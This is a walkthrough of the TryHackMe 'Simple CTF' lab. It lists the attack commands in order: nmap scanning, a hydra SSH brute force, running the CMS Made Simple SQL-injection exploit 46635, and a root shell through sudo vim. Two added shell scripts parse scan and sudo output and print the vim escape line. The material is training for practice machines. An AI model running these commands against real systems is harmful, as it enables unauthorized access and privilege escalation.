Simple CTF - WriteUp [TryHackMe]
TryHackMe is a great platform for students to learn cybersecurity and for teachers to deploy rooms for their students to practise in.
Today we are going to see one of the rooms in TryHackMe i.e. Simple CTF. This room is created by MrSeth6797.
Guys, follow along with me by clicking on the link or clicking the image above.
QUESTIONS:
#1. How many services are running under port 1000?
#2. What is running on the higher port?
#3. What’s the CVE you are using against the application?
#4. To what kind of vulnerability is the application vulnerable?
#5. What’s the password?
#6. Where can you login with the details obtained?
#7. What’s the user flag?
#8. Is there any other user in the home directory? What’s its name?
#9. What can you leverage to spawn a privileged shell?
#10. What’s the root flag?
SOLUTION:
NMAP AGGRESSIVE SCAN
The very first thing I did was an nmap aggressive scan across the full port range. The reason for using an aggressive scan (-A) is that it bundles version detection, the default NSE scripts, OS detection and traceroute, so we get as much information as possible about the ports and the services running on the target machine. It is noisy, but that does not matter on a CTF box.
nmap -A -p- -T4 -oN initial machine_ip
Our nmap scan shows a total of three open ports, i.e. 21 (FTP), 80 (HTTP) and 2222 (SSH).
That already gives us the answers to Questions #1 and #2: two services are running under port 1000 (FTP on 21 and HTTP on 80), and the higher port, 2222, is running SSH.
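As an added example (this script is not part of the original write-up), here is a small POSIX shell script that answers Questions #1 and #2 from the saved normal-format output, i.e. the file written by -oN. It runs against a constructed sample of such output: the three open ports come from the scan above, while the version strings, the latency and the closed port 1000 are made up to exercise the parser.

```sh
#!/bin/sh
# Added example: parse nmap -oN output to answer "how many services under
# port 1000" and "what runs on the highest port". Not from the write-up.

# Constructed sample of `nmap -A -p- -T4 -oN initial machine_ip` output.
# Only the three open ports (21, 80, 2222) come from the scan in the write-up;
# version strings, latency and the closed port 1000 are made up for the demo.
NMAP_SAMPLE='# Nmap 7.80 scan initiated as: nmap -A -p- -T4 -oN initial 10.10.10.10
Nmap scan report for 10.10.10.10
Host is up (0.085s latency).
Not shown: 65531 filtered ports
PORT     STATE  SERVICE VERSION
21/tcp   open   ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
80/tcp   open   http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
1000/tcp closed cadlock
2222/tcp open   ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
# Nmap done at Sat Jan  1 00:00:00 2022 -- 1 IP address (1 host up) scanned in 120.00 seconds'

# Only lines of the form "<port>/<proto>  open  <service> ..." are counted;
# NSE script output ("|" / "|_"), banners and closed ports never match.

# Question #1: number of open ports strictly below the limit $1 in the scan text $2.
open_ports_below() {
    printf '%s\n' "$2" | awk -v lim="$1" '
        /^[0-9]+\/(tcp|udp)[ \t]+open[ \t]/ {
            split($1, p, "/")
            if (p[1] + 0 < lim) n++
        }
        END { print n + 0 }'
}

# Question #2: "<port> <service>" of the highest-numbered open port in the scan text $1.
# Prints nothing when no open port was found.
highest_open_port() {
    printf '%s\n' "$1" | awk '
        /^[0-9]+\/(tcp|udp)[ \t]+open[ \t]/ {
            split($1, p, "/")
            if (p[1] + 0 > max) { max = p[1] + 0; svc = $3 }
        }
        END { if (max) print max, svc }'
}

echo "Open ports below 1000: $(open_ports_below 1000 "$NMAP_SAMPLE")"
echo "Highest open port:     $(highest_open_port "$NMAP_SAMPLE")"
```

On a real run you would replace the embedded sample with `"$(cat initial)"`. The filter deliberately keys on the STATE column, so a -p- scan that lists closed or filtered ports individually does not inflate the count.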
The nmap scan also reports that the FTP server allows anonymous login, so we connect with the ftp client and log in as anonymous:
ftp machine_ip
The only file we get from the anonymous FTP share is ForMitch.txt:
cat ForMitch.txt
So we know there is probably a user named Mitch whose password is very weak. That’s interesting!
Hydra will do the password brute forcing for us. A weak password should fall to a small wordlist, so we use dirb’s best110 list against SSH on port 2222 (note the lowercase username):
hydra -l mitch -P /usr/share/dirb/wordlists/others/best110.txt ssh://machine_ip:2222
This will help us answer Question #5.
Next we look at the web application running on port 80 (HTTP). Navigating to the machine IP in a browser only gives us the default Apache page.
From here we use gobuster and/or dirbuster to find the available directories:
gobuster dir -u http://machine_ip -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -o gobuster.log
gobuster finds the /simple directory in the web application. Navigating to /simple, we find CMS Made Simple running.
It identifies itself as CMS Made Simple version 2.2.8.
We use searchsploit to look for available exploits for CMS Made Simple 2.2.8:
searchsploit CMS made simple 2.2.8
To answer Question #3 we examine the header of exploit 46635, which references the CVE it targets:
searchsploit 46635 --examine | grep CVE
So we have found the exploit; let’s try to execute it. We copy the exploit into our working directory (searchsploit -m 46635 does this), rename it sqli.py and run it with the crack option and the same small wordlist:
python sqli.py -u http://machine_ip/simple/ --crack -w /usr/share/dirb/wordlists/others/best110.txt
Running the exploit may fail with an error that the termcolor module is not found; we can fix that by installing it with pip:
pip install termcolor
After running the exploit we get the username and password as follows:
The answer to Question #6 is then obvious: we can log in to SSH on port 2222 with the credentials we found.
ssh mitch@machine_ip -p 2222
We have logged in with Mitch’s credentials. For convenience I switch to an interactive bash shell with the command bash -i:
bash -i
Here we find the user flag, which is the answer to Question #7.
To answer the next question, #8, we list the /home directory to see the other user:
cd /home && ls
We are nearing the end of this CTF with only two questions left. For the second-last question, #9, we run sudo -l to see whether there is anything we are allowed to run as root:
sudo -l
Great news: we can run vim with root privileges. vim can execute shell commands from its command line (:!command, or :shell for an interactive shell), and because sudo started vim as root, any shell spawned from inside it runs as root too.
After that we have a root shell on the machine and can read the root flag for Question #10.
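As an added example (again not from the original write-up), a small POSIX shell script that parses sudo -l output for NOPASSWD entries that run as root and prints the vim one-liner that spawns a root shell. The sudo -l sample is constructed; only the vim entry reflects what the write-up reports, the rest is typical sudoers boilerplate.

```sh
#!/bin/sh
# Added example: find NOPASSWD root entries in `sudo -l` output and print
# the vim shell escape for them. Not from the write-up.

# Constructed sample of `sudo -l` output for the user mitch. Only the vim
# entry reflects what the write-up reports; the rest is generic boilerplate.
SUDO_L_SAMPLE='Matching Defaults entries for mitch on Machine:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User mitch may run the following commands on Machine:
    (root) NOPASSWD: /usr/bin/vim'

# Print each command the user may run as root without a password, one per
# line. sudoers lists several commands on one line separated by ", ", and the
# run-as spec may be "(root)" or "(ALL : ALL)".
root_nopasswd_cmds() {
    printf '%s\n' "$1" | awk '
        /^[ \t]*\((root|ALL)([ \t]*:[ \t]*[A-Za-z]+)?\)[ \t]+NOPASSWD:/ {
            sub(/^[ \t]*\([^)]*\)[ \t]+NOPASSWD:[ \t]*/, "")
            n = split($0, cmds, /,[ \t]*/)
            for (i = 1; i <= n; i++) print cmds[i]
        }'
}

# For an editor that can run shell commands, print the one-liner that spawns
# a root shell: vim executes ":!cmd" from inside the editor, and because sudo
# started vim as root the shell inherits root. Returns 1 for anything else.
shell_escape_for() {
    case "${1##*/}" in
        vim|vi) printf "sudo %s -c ':!/bin/sh'\n" "$1" ;;
        *) return 1 ;;
    esac
}

root_nopasswd_cmds "$SUDO_L_SAMPLE" | while read -r cmd; do
    shell_escape_for "$cmd" || echo "no known escape for $cmd in this script"
done
```

The -c ':!/bin/sh' form runs the escape straight from the command line; typing :!/bin/sh (or :shell) at vim’s prompt after sudo vim does the same thing. Either way, confirm the result with id before hunting for the root flag.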
I hope you learnt something new from this write-up.
Happy Hunting!
You can find me on LinkedIn and Twitter for further queries, and drop your valuable suggestions at my handles.